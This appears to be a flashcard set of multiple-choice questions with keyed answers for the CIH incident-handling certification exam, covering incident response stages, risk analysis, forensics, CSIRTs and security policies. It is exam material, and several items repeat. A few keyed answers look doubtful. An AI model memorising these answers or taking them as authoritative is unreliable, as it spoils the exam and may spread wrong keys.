CIH Flashcards
preparation for CIH exam
A Distributed Denial-of-Service (DDoS) attack is a more common type of DoS attack, where a single system is targeted by a large number of infected machines over the Internet. In a DDoS attack, attackers first infect multiple systems which are known as:
Spyware
Zombies
Worms
Trojans
Zombies
Which one of the following is the correct flow of the stages in an incident response?
Eradication –> Containment –> Identification –> Preparation –> Recovery –> Follow-up
Identification –> Preparation –> Containment –> Recovery –> Follow-up - -> Eradication
Containment –> Identification –> Preparation –> Recovery –> Follow-up –> Eradication
Preparation –> Identification –> Containment –> Eradication –> Recovery –> Follow-up
Preparation –> Identification –> Containment –> Eradication –> Recovery –> Follow-up
Risk analysis involves the process of defining and evaluating dangers. The numerical determination of the probability of an adverse event, and the extent of the losses due to the event, refers to which approach of risk determination? Descriptive risk analysis Analytical risk analysis Quantitative risk analysis Qualitative risk analysis
Quantitative risk analysis
One of the main objectives of incident management is to prevent incidents and attacks by tightening the physical security of the system or infrastructure. According to CERT’s incident management process, which stage focuses on implementing infrastructure improvements resulting from postmortem reviews or other process improvement mechanisms? Detection Triage Protection Preparation
Protection
Insider threats can be detected by observing concerning behaviors exhibited by insiders, such as conflicts with supervisors and coworkers, decline in performance, tardiness, or unexplained absenteeism. Select the technique that helps in detecting insider threats.
Categorizing information according to its sensitivity and access rights
Protecting computer systems by implementing proper controls
Making it compulsory for employees to sign a nondisclosure agreement
Correlating known patterns of suspicious and malicious behavior
Correlating known patterns of suspicious and malicious behavior
Risk management consist of three processes; risk assessment, risk mitigation and evaluation and assessment. Risk assessment determines the extent of the potential threat and the risk associated with an IT system throughout its SDLC. How many primary steps does NIST’s risk assessment methodology involve? Nine Twelve Four Six
Nine
An incident response plan consists of a set of instructions to detect and respond to an incident. It defines the areas of responsibility, and creates procedures for handling various computer security incidents. Which of the following is an essential pre-requisite for an Incident response plan? Availability of forensic experts An approval from court of law Incident analysis report Company’s financial support
Company’s financial support
Incident handling and response steps help you to detect, identify, respond, and manage an incident. Which of the following helps in recognizing and separating the infected hosts from the information system?
Configuring firewall to default settings
Browsing particular government websites
Inspecting the processes running on the system
Sending mails to only group of friends
Inspecting the processes running on the system
Incident handling and response steps help you to detect, identify, respond and manage an incident. Which of the following steps focuses on limiting the scope and extent of an incident? Identification Data Collection Containment Eradication
Containment
In which of the steps of NIST’s risk assessment methodology are the boundaries of the IT system, along with the resources and the information that constitute the system, identified? Control Recommendations Control Analysis System Characterization Likelihood Determination
System Characterization
Which of the following incident recovery testing methods works by creating a mock disaster, like a fire, toidentify the reaction of the procedures that are implemented to handle such situations? Scenario testing Procedure testing Facility testing Live Walk Through testing
Scenario testing
US-CERT and federal civilian agencies use the reporting timeframe criteria in the federal agency reporting categorization. What is the timeframe required to report an incident under the CAT 4 federal agency category?
Weekly
Monthly
Within two (2) hours of discovery/detection
Within four (4) hours of discovery/detection if the successful attack is still ongoing and the agency is unable to successfully mitigate activity
Weekly
Identify the network security incident where intended authorized users are prevented from using system, network, or applications by flooding the network with a high volume of traffic that consumes all existing network resources. SQL injection URL manipulation XSS attack Denial-of-Service
Denial-of-Service
Multiple component incidents consist of a combination of two or more attacks in a system. Which of the following is not a multiple component incident?
An insider intentionally deleting files from a workstation
An attacker using email with malicious code to infect internal work station
An attacker redirecting user to a malicious website and infects his system with Trojan
An attacker infecting a machine to launch a DDoS attack
An insider intentionally deleting files from a workstation
The data on affected systems must be backed up so that it can be retrieved if it is damaged during incident response. The system backup can also be used for further investigation of the incident. Identify the stage of the incident response and handling process in which complete backup of the infected system is carried out? Containment Incident recording Incident investigation Eradication
Containment
An access control policy authorizes a group of users to perform a set of actions on a set of resources. Access to resources is based on necessity and if a particular job role requires the use of those resources. Which of the following is not a fundamental element of an access control policy?
Action group: Group of actions performed by the user on resources
Development group: Group of persons who develop the policy
Access group: Group of users to which the policy applies
Resource group: Resources controlled by the policy
Development group: Group of persons who develop the policy
Host based evidence is the evidence gathered and available on a computer system. It may include logs, records, documents, and any other information stored in a computer system. Network-based evidence is the information gathered from the network resources. Which of the following is Host-Based evidence? Wiretaps IDS logs Router logs State of network interface
State of network interface
Organizations, or incident response teams, need to protect the evidence for any future legal actions that may be taken against perpetrators that intentionally attacked the computer system. Evidence protection is also required to meet legal compliance issues. Which of the following documents helps in protecting evidence from physical or logical damage? Chain-of-Custody Chain-of-Precedence Forensic analysis report Network and Host log records
Chain-of-Custody
An organization faced an information security incident, where a disgruntled employee passed sensitive access control information to a competitor. The organization’s incident response manager, upon investigation, found that the incident must be handled within a few hours on the same day to maintain business continuity and market competitiveness. How would you categorize such information security incidents? High level incident Middle level incident Ultra-high level incident Low level incident
Middle level incident
Which among the following CERTs is an Internet provider to higher education institutions and various other research institutes in the Netherlands, and deals with all cases related to computer security incidents in which a customer is involved, either as a victim or as a suspect? Funet CERT SURFnet-CERT NET-CERT DFN-CERT
SURFnet-CERT
The goal of incident response is to handle the incidents in a way that minimizes damage and reduces recovery time and costs. Which of the following does not constitute a goal of incident response?
Dealing properly with legal issues that may arise during incidents
Using information gathered during incident handling to prepare for handling future incidents in a better way and to provide stronger protection for systems and data
Helping personnel to recover quickly and efficiently from security incidents, minimizing loss or theft of information and disruption of services
Dealing with human resource department and various employee conflict behaviors
Dealing with human resource department and various employee conflict behaviors
The insider’s incident response plan helps the organization to minimize or limit the damage caused due to malicious insiders. Organizations should ensure that the insider perpetrators are not included in the response team or are not aware of the progress. Which of the following statements is not true about the incident response plan?
The organization should regularly update the employee on different forms of external and internal attacks through training program
The employees should also be trained on how to report suspicious behaviors of the insiders
The organization should share or provide the details of the insider’s incident response plan with all employees
Persons responsible for handling insiders incidents should be trained on the contents and execution of the response plan
The organization should share or provide the details of the insider’s incident response plan with all employees
A computer virus hoax is a message warning the recipient of a non-existent computer virus threat. The message is usually a chain e-mail that tells the recipient to forward it to everyone they know. Which of the following is not a symptom of virus hoax message?
The message warns to delete certain files if the user does not take appropriate action
The message prompts the user to install Anti-virus
The message from a known email id is caught by SPAM filters due to change in filter settings
The message prompts the end user to forward it to his/her email contact list and gain monetary benefits in doing so
The message from a known email id is caught by SPAM filters due to change in filter settings
One of the goals of CSIRT is to manage security problems by taking a certain approach towards the customers’ security vulnerabilities, and by responding effectively to potential information security incidents. Identify the incident response approach that focuses on developing the infrastructure and security processes before the occurrence or detection of an event or any incident. Interactive approach Qualitative approach Proactive approach Interactive approach
Proactive approach
The type of relationship between CSIRT and its constituency have an impact on the services provided by the CSIRT. Identify the level of authority that enables the members of CSIRT to undertake any necessary actions on behalf of their constituency? Half-level authority Shared-level authority Mid-level authority Full-level authority
Full-level authority
Sam, an employee from a multinational company, uses his company’s account to send e-mails to a third party with their spoofed mail address. How can you categorize this type of account? Denial-of-Service incident Network intrusion incident Unauthorized access incident Inappropriate usage incident
Inappropriate usage incident
A Computer Risk policy is a set of ideas to be implemented to overcome the risk associated with computer security incidents. Identify the procedure that is not part of the computer risk policy?
Provisions for continuing support if there is an interruption in the system or if the system crashes
Procedures for the ongoing training of employees authorized to access the system
Procedure to identify security funds to hedge risk
Procedures to monitor the efficiency of the security controls
Procedures to monitor the efficiency of the security controls
Computer forensics is the branch of forensic science in which legal evidence is found in any computer or on any digital media devices. Of the following, who is responsible for examining the evidence acquired and separating the useful evidence? Evidence Manager Evidence Examiner/Investigator Evidence Documenter Evidence Supervisory
Evidence Examiner/Investigator
An information system processes data into useful information to achieve specified organizational or individual goals. It accepts, processes, and stores data in the form of records in a computer system, and automates some of the information processing activities of the organization. Who is responsible for implementing and controlling the security measures of an information system? Information Custodian Information Owner Information Implementer Information Consultant
Information Custodian
In a qualitative risk analysis, risk is calculated in terms of:
(Attack Success + Criticality) – (Countermeasures)
Probability of Loss X Loss
(Countermeasures + Magnitude of Impact)- (Reports from prior risk assessments)
Asset criticality assessment –(Risks and Associated Risk Levels)
(Attack Success + Criticality) – (Countermeasures)
Which one of the following is an appropriate flow of the incident recovery steps?
System Restoration –> System Monitoring –> System Validation –> System Operations
System Operations –> System Restoration –> System Validation –> System Monitoring
System Validation –> System Operations –> System Restoration –> System Monitoring
System Restoration –> System Validation –> System Operations –> System Monitoring
System Restoration –> System Validation –> System Operations –> System Monitoring
Risk is defined as the probability of the occurrence of an incident. Risk formulation generally begins with the likeliness of an event’s occurrence, the harm it may cause, and is usually denoted as:
Significances
Probability
Magnitudes
Consequences
Consequences
An audit trail policy collects all audit trails such as series of records of computer events, about an operating system, an application, or user activities. Which of the following statements is not true for an audit trail policy
It helps in reconstructing the events after a problem has occurred
It helps in calculating intangible losses to the organization due to an incident
It helps in compliance to various regulatory laws, rules, and guidelines
It helps in tracking individual actions and allows users to be personally accountable for their actions
It helps in calculating intangible losses to the organization due to an incident
Computer forensics is a methodical series of techniques and procedures for gathering evidence from computing equipment, various storage devices and/or digital media that can be presented in a court of law in a coherent and meaningful format. Which one of the following is an appropriate flow of steps in the computer forensics process?
Examination> Analysis> Preparation> Collection> Reporting
Analysis> Preparation> Collection> Reporting> Examination
Preparation> Collection> Examination> Analysis> Reporting
Preparation> Analysis> Collection> Examination> Reporting
Preparation> Collection> Examination> Analysis> Reporting
Quantitative risk is the numerical determination of the probability of an adverse event, and the extent of the losses due to the event. Quantitative risk is calculated as:
Significant Risks x Probability of Loss X Loss
(Probability of Loss) / (Loss)
(Loss) / (Probability of Loss)
(Probability of Loss) X (Loss)
(Probability of Loss) X (Loss)
The incident management team provides support to all users in the organization that are affected by the threat or attack. The organization’s internal auditor is part of the incident response team. Identify one of the responsibilities of the internal auditor as a part of the incident response team.
Perform necessary action required to block the network traffic from the suspected intruder
Coordinate incident containment activities with the information security officer
Configure information security controls
Identify and report security loopholes to the management for necessary actions
Identify and report security loopholes to the management for necessary actions
When an employee is terminated from his/her job, what should be the next immediate step taken by an organization?
The access requests granted to an employee should be documented and vetted by a supervisor
All access rights of the employee to physical locations, networks, systems, applications, and data should be disabled
The organization should enforce separation of duties
The organization should monitor the activities of the system administrators and privileged users who have permissions to access the sensitive information
All access rights of the employee to physical locations, networks, systems, applications, and data should be disabled
Which of the following terms may be defined as “a measure of possible inability to achieve a goal, objective, or target within a defined security, cost, plan, and technical limitations that adversely affects the organization’s operations and revenues?” Incident Response Threat Vulnerability Risk
Risk
A file or an object found on the system that might involve attacking systems and networks is known as an “artifact”. Handling an artifact involves receiving information about the artifacts that are used in intruder attacks, investigation, and other unauthorized activities causing distortions. Identify the CSIRT service category that artifact handling belongs to?
Reactive services
Proactive services
Incident tracking and reporting systems services
Security quality management services
Reactive services
An incident is analyzed for its nature, intensity, and its effects on the network and systems. Which stage of the incident response and handling process involves auditing the system and network log files? Identification Containment Incident recording Reporting
Identification
Contingency planning enables organizations to develop and maintain effective methods to handle emergencies. Every organization will have its own specific requirements that the planning should address. There are five major components of the IT contingency plan; namely supporting information, notification/activation, recovery, and reconstitution and plan appendices. What is the main purpose of a reconstitution plan?
To restore the original site, tests systems to prevent the incident, and terminates operations
To provide the introduction and detailed concept of the contingency plan
To provide a sequence of recovery activities with the help of recovery procedures
To define the notification procedures, damage assessments, and offers the plan activation
To restore the original site, tests systems to prevent the incident, and terminates operations
Identifying and analyzing an incident is a very critical part of the incident response procedure. Which of the following signs do not indicate a computer security incident?
System crashes or poor system performance
Failed logon attempts and creation of new user accounts
A system alarm or similar indication from an intrusion-detection
Smoke emitting from the system
Smoke emitting from the system
In the Control Analysis stage of the NIST’s risk assessment methodology, technical and nontechnical control methods are classified into two categories. What are these two control categories? Preventive and Detective controls Predictive and Detective controls Detective and Disguised controls Preventive and Predictive controls
Preventive and Detective controls
Which policy recommends controls for securing and tracking organizational resources? Access control policy Administrative security policy Acceptable use policy Asset control policy
Asset control policy
Except for some common roles, the roles in an IRT are distinct for every organization. Which among the following is the role played by the Incident Coordinator of an IRT?
Links the appropriate technology to the incident to ensure that the foundation’s offices are returned to normal operations as quickly as possible
Links the groups that are affected by the incidents, such as legal, human resources, different business areas, and management
Applies the appropriate technology and tries to eradicate and recover from the incident
Focuses on the incident and handles it from management and technical point of view
Links the groups that are affected by the incidents, such as legal, human resources, different business areas, and management
“Information warfare” is conflict that uses Information/Information systems as weapons. “Offensive” and “defensive” are two types of information warfare. Which of the following is an example of defensive information warfare?
Disabling SSID broadcasts so that unauthorized users cannot detect the presence of a wireless network
Hijacking television and radio transmissions for generating disinformation
Spoofing or disabling the communication networks of a competitor or an enemy
Jamming radio transmissions
Disabling SSID broadcasts so that unauthorized users cannot detect the presence of a wireless network
Policies are designed to protect the organizational resources on the network by establishing the set rules and procedures. Which of the following policies authorizes a group of users to perform a set of actions on a set of resources? Documentation policy Audit Trail Policy Logging Policy Access Control Policy
Access Control Policy
Signs of an Incident are categorized into one of two categories: Precursor or Indication. Precursor indicates the possibility of a security incident occurrence, and Indication implies that an incident has probably occurred or is in progress. Identify which of the following is a precursor to an incident?
The network administrator notices an unusual deviation from the typical network traffic flows
A user approaches the help desk to report of abusing/threatening email
Warning from an antivirus program or scanner that threat(s) from virus/worm is identified on the user’s system.
A new found vulnerability in the organization server, in case the vendor makes an announcement of the same
A new found vulnerability in the organization server, in case the vendor makes an announcement of the same
Identify a standard national process which establishes a set of activities, general tasks, and a management structure to certify and accredit systems that will maintain the information assurance (IA) and security posture of a system or site. NIASAP NIACAP NIAAAP NIPACP
NIACAP
The network perimeter should be configured in such a way that it denies all incoming and outgoing traffic/services that are not required. Which service listed below, if blocked, can help in preventing Denial of Service attack? SMTP service SAM service POP3 service Echo service
Echo service
A security policy will take the form of a document or a collection of documents, depending on the situation or usage. It can also become a point of reference in case a violation occurs that results in a dismissal or other penalty. Which of the following is NOT true for a good security policy?
It must be approved by a court of law after verification of stated terms and facts
It must clearly define the areas of responsibility for the users, administrators, and management
It must be enforceable with security tools where appropriate, and with sanctions, where actual prevention is not technically feasible
It must be implementable through system administration procedures, publishing of acceptable use guidelines, or other appropriate methods
It must be approved by a court of law after verification of stated terms and facts
The insiders risk matrix consists of technical literacy and business process knowledge vectors. Considering the matrix, one can conclude that:
If the insiders’ technical literacy and process knowledge is high, the risk posed by the threat will be high
If the insiders’ technical literacy is low and process knowledge is high, the risk posed by the threat will be insignificant
If the insiders’ technical literacy is high and process knowledge is low, the risk posed by the threat will be high
If the insiders’ technical literacy and process knowledge are high, the risk posed by the threat will be insignificant
If the insiders’ technical literacy and process knowledge is high, the risk posed by the threat will be high
A computer forensic investigator must perform a proper investigation to protect digital evidence. During the investigation, an investigator needs to process large amounts of data using a combination of automated and manual methods. Identify the computer forensic process involved.
Preparation
Collection
Reporting
Examination
Examination
Incident handling and response steps help you to detect, identify, respond and manage an incident. Which of the following steps focuses on limiting the scope and extent of an incident?
Identification
Eradication
Data Collection
Containment
Containment
Business continuity is defined as the ability of an organization to continue to function even after a disastrous event, accomplished through the deployment of redundant hardware and software, the use of fault tolerant systems, as well as a solid backup and recovery strategy. Identify the plan which is a mandatory part of a business continuity plan?
New business strategy plan
Business recovery plan
Forensics procedure plan
Sales and marketing plan
Business recovery plan
Information gathering is an integral part of information warfare. Which of the following activities is a part of passive information gathering?
Obtaining details of the target organization by scanning their network
Obtaining details of the target organization by taking services of underground hacking forums
Obtaining details of the target organization that are freely available on the Internet, and through various other techniques without coming into direct contact with the organization
Obtaining details of the target organization that are freely available on the Internet, and through various other techniques by coming into direct contact with the organization
Obtaining details of the target organization that are freely available on the Internet, and through various other techniques without coming into direct contact with the organization
Which policy recommends controls for securing and tracking organizational resources?
Administrative security policy
Access control policy
Asset control policy
Acceptable use policy
Asset control policy
Which of the following tools is a stand-alone utility used to detect and remove specific viruses? It is not a substitute for full anti-virus but assists administrators and users while dealing with an infected system, and utilizes next generation scan engine technology that includes process scanning, digitally signed DAT files and scan performance optimizations.
Site Advisor
Tripwire Enterprise
HijackThis
Stinger
Stinger
A US Federal agency network was the target of a DoS attack that prevented and impaired the normal authorized functionality of the networks. According to agency’s reporting timeframe guidelines, this incident should be reported within two (2) hours of discovery/detection if the successful attack is still ongoing and the agency is unable to successfully mitigate the activity. Which incident category of US Federal Agency does this incident belong to?
CAT 5
CAT 2
CAT 1
CAT 6
CAT 2
An incident recovery plan is a statement of actions that should be taken before, during, or after an incident.Identify which of the following is not an objective of the incident recovery plan?
Creating new business processes to maintain profitability after incident
Providing a standard for testing the recovery plan
Avoiding the legal liabilities arising due to incident
Providing assurance that systems are reliable
Creating new business processes to maintain profitability after incident
A threat source does not present a risk if there is no vulnerability that can be exercised for a particular threat source. Identify the step in which different threats and threat sources are determined? Threat identification System characterization Identification Vulnerabilities Control Analysis
Threat identification
Which one of the following is an appropriate flow of the incident recovery steps?
System Restoration –> System Validation –> System Operations –> System Monitoring
System Validation –> System Operations –> System Restoration –> System Monitoring
System Operations –> System Restoration –> System Validation –> System Monitoring
System Restoration –> System Monitoring –> System Validation –> System Operations
System Restoration –> System Validation –> System Operations –> System Monitoring
A risk mitigation strategy determines the circumstances under which an action has to be taken to minimize and overcome risks. Identify the risk mitigation strategy that focuses on minimizing the probability of risks and losses by searching for vulnerabilities in the system and appropriate controls.
Research and acknowledgment
Risk limitation
Risk absorption
Risk assumption
Research and acknowledgment
Mysoft, a major software developer located out of New Jersey, realized that sensitive information from folders shared across its network is being accessed by unauthorized people and leaked to third parties, which could result in huge financial losses for the organization. In this context, which of the following statements most appropriately defines “computer security incident”?
Events related to physical security incidents and trouble- shooting issues in corporate networks
Any real or suspected adverse event in relation to the security of computer systems or networks
Policies guaranteeing access to information system resources
Rectifying the loss of information that may affect the investment of the organization in different business activities
Any real or suspected adverse event in relation to the security of computer systems or networks
Risk mitigation strategy determines the circumstances under which an action has to be taken to minimize and overcome risks. An organization that absorbs minor risks while preparing to respond to major risks relates to which risk mitigation strategy?
Risk limitation
Risk avoidance
Risk absorption
Risk assumption
Risk absorption
Identify the malicious program that is masked as a genuine harmless program, and gives the attacker unrestricted access to the user’s information and system. These programs may unleash dangerous programs that may erase the unsuspecting user’s disk, and send the victim’s credit card numbers and passwords to a stranger.
Cookie tracker
Worm
Virus
Trojan
Trojan
